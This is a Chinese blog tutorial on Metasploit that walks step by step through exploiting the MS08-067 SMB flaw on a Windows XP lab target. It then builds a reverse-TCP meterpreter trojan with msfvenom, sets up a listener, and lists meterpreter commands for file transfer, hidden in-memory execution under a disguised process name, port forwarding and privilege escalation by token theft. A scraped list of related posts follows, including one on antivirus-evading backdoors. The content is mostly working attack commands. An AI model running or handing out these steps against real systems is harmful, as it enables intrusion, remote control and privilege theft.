(msf使用)msfconsole - meterpreter
【msf】 msfconsole meterpreter
对于这款强大渗透测试框架,详情介绍可看这里:metasploit 使用教程
对于msfconsole, Kali Linux 自带。只需用命令行启动便可。
msfconsole 启动不了/初次使用
service postgresql start # 启动数据库服务
msfdb init # 初始化数据库
msfconsole # 启动metasploit
【注】msfconsole 不会就用 msfconsole -h msf5 > help 查看帮助
ms08-067漏洞攻击实践
用 ifconfig 命令 可 查看kail 系统ip ipconfig 查看 Windows ip
kali: 192.168.xxx.xxx (攻击靶机)
windows xp xxx : 192.168.xxx.xxx (被攻击靶机)
msfconsole - 进入
msfconsole

红框中 标记的是:Metasploit所有的利用模块、payload、post模块等等模块
search - 查看漏洞
search ms08_067

use - 使用漏洞
use exploit/windows/smb/ms08_067_netapi
show - 查看可以攻击的靶机操作系统型号(targets)
show targets
set - 设置target 参数
xx是对应被攻击靶机的型号
set target xx
set - 设置rhost参数
此ip为被攻击靶机的ip地址
set rhost 192.168.xxx.xxx
show - 查看参数
show options

exploit - 进行攻击
exploit

session 查看目前服务器端会话
sessions -i
启动x会话 。
sessions -i x
之后用 meterpreter 命令,转 shell 命令
shell
back - 实现返回
back

查看 payload
show payloads
利用msfvenom生成木马攻击靶场
【参考链接】: i春秋 Meterpreter综合提权
msfvenom 生成 .exe 文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=yyyy -f exe -o /tmp/muma.exe
windows/meterpreter/reverse_tcp : payload
lhost :木马反弹到的监听端地址=192.168.xxx.xxx
lport :监听端口=yyyy
常见 msfvenom 命令参数如下:
-p 选择一个载荷(payload)
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-h 帮助
用msfconsole监听
选用 exploit/multi/handler 监听模块
use exploit/multi/handler
设置payload:
set payload windows/x64/meterpreter/reverse_tcp
设置 监听ip地址以及监听端口:
set lhost 192.168.xxx.xxx
set lport yyyy
查看设置参数:
show options
开启配置模块进行监听
exploit
Meterpreter
常见命令
upload - 上传文件
上传1.txt到目标靶机c:\muma\下
upload 1.txt c:\\muma\\
download - 下载目标靶机相对应权限的任意路径下的文件
命令
download file pathdownload c:\\muma\\1.txt
sysinfo命令:显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息。
运行目标主机上的cmd.exe程序,以隐藏的方式直接交互到meterpreter会话上
execute -H -i -f cmd.exe
execute -H -m -d notepad.exe-f muma.exe -a "-o muma.txt" -d 在目标主机执行时显示的进程名称(用以伪装) -m 直接从内存中执行 "-o muma.txt"是muma.exe的运行参数
网络命令
portfwd命令:portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx # 端口转发,本机监听yyyy,把目标机zzzz转到本机yyyy netstat -an | grep"yyyy" #查看指定端口开放情况
基础提权
getsystem
利用 ps 命令查看目标靶机当前进程
找到管理员相应PID。若PID:xxxx
steal_token xxxx
#盗取guanliyuan
getuid
#检查是否成功
shell
【侵权删】
【转载请放链接】 https://www.cnblogs.com/Jlay/p/msf.html
(msf使用)msfconsole - meterpreter的更多相关文章
- msf入门学习笔记
msf-------------------------------------- service postgresql startservice metasploit startmsfconsole ...
- 20155233 《网络对抗》 Exp5 MSF基础应用
主动攻击:ms08_067漏洞攻击 启用msf终端msfconsole然后使用search命令搜索该漏洞对应的模块:search ms08_067 选择输入use exploit/windows/sm ...
- 2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用
2017-2018-2 20155310『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:由攻击者或渗透测试者利 ...
- 2015306 白皎 《网络攻防》Exp5 MSF基础应用
2015306 白皎 <网络攻防>Exp5 MSF基础应用 一.基础问题 用自己的话解释什么是exploit,payload,encode. exploit指由攻击者或渗透测试者利用一个系 ...
- msf生成软件
生成软件后门程序的命令 win7获取 生成内网软件 启动kali上的http服务 systemctl start apache2 开始msf控制台 msfconsole 使用监听模块 并查看配置 s ...
- msf学习笔记
metasploit frame 这是一个渗透测试框架,围绕这个框架,我们就可以完成最终的目标,即渗透测试. 渗透测试者困扰:需要掌握数百个工具,上千条命令参数,很难记住. 新出现的漏洞PoC/EXP ...
- meterpreter php payload && windows payload 学习
一 情景 本地kali linux 192.168.1.2 目标 windows NT 服务器192.168.1.4 目的是获取shell 二 过程 首先在linux建立终端 ,msfconsole ...
- [技术分享]利用MSBuild制作msf免杀的后门
文章github上有公开现成的shellcode,这就是shellcode 我这次选择了32位的那个版本来进行演示 需要改写的是shellcode那部分: 选择CobaltStrike:payload ...
- Metasploit 使用MSFconsole接口
什么是MSFconsole? 该msfconsole可能是最常用的接口使用Metasploit框架(MSF).它提供了一个“一体化”集中控制台,并允许您高效访问MSF中可用的所有选项.MSFconso ...
随机推荐
- Error:(4, 17) java: 程序包org.junit不存在
内容:Error:(4, 17) java: 程序包org.junit不存在 场景:运行测试类的时候,IED新建一个自己的项目,并且不用maven的情况下 解决方案:File -> Projec ...
- influxdb集群部署
环境准备 influxdb enterprise运行条件最低需要三个meta nodes节点以及两个data nodes Meta nodes之间使用TCP和Raft一致性协议通信,默认端口为8089 ...
- Anderson《空气动力学基础》5th读书笔记 第0记——白金汉PI定理
目录 量纲分析:白金汉PI定理 相似参数 量纲分析:白金汉PI定理 在空气动力学中,飞机的空气动力主要由自由来流的密度ρ∞,自由来流数V∞,翼弦长度c,自由来流的粘性系数μ∞以及音速a∞,所以假设我们 ...
- 自学Python可以吗?怎样从入门到大师?我写这篇文章告诉你
前言 很多粉丝朋友问我该如何去学习爬虫.学习Python.自学能找到工作吗?等一系列的问题.今天我就来回答一下大家. 第一点 确定好方向与目标 当决定踏入这个行业那一刻起,我想每一个人都爱已经准备投身 ...
- springboot添加拦截器
一,编写拦截器 public class TokenInterceptor implements HandlerInterceptor { @Override public boolean preHa ...
- (Pytorch)涉及的常见操作
涉及一些pytorch的API内容在此进行整理 损失函数:Binary-Cross-Entropy loss criterion = nn.BCECriterion() 创建一个标准来度量目标和输出之 ...
- RS485转以太网的概述和应用领域
如今随着物联网技术的不断发展,各种接口更新换代的速度非常的快,RS485转以太网的主要作用就是提供串口转TCP/IP网络接口的功能,它可以将RS232/485/422串口转换成TCP/IP网络接口,实 ...
- AQS源码深入分析之共享模式-你知道为什么AQS中要有PROPAGATE这个状态吗?
本文基于JDK-8u261源码分析 本篇文章为AQS系列文的第二篇,前文请看:[传送门] 第一篇:AQS源码深入分析之独占模式-ReentrantLock锁特性详解 1 Semaphore概览 共享模 ...
- 浅析 AC 自动机
目录 简述 AC 自动机是什么 AC 自动机有什么用 AC 自动机·初探 AC 自动机·原理分析 AC 自动机·代码实现 AC 自动机·更进一步 第一题 第二题 第三题 从 AC 自动机到 fail ...
- 力扣 122 买卖股票的最佳时机II
力扣 122 买卖股票的最佳时机II 思路: 动态规划,表面上是\(O(2^n)\)的搜索空间,实际上该天的选择只与前一天的状态(是否持有股票)有关.从收益的角度来看,确实每一天的不同选择都会产生不同 ...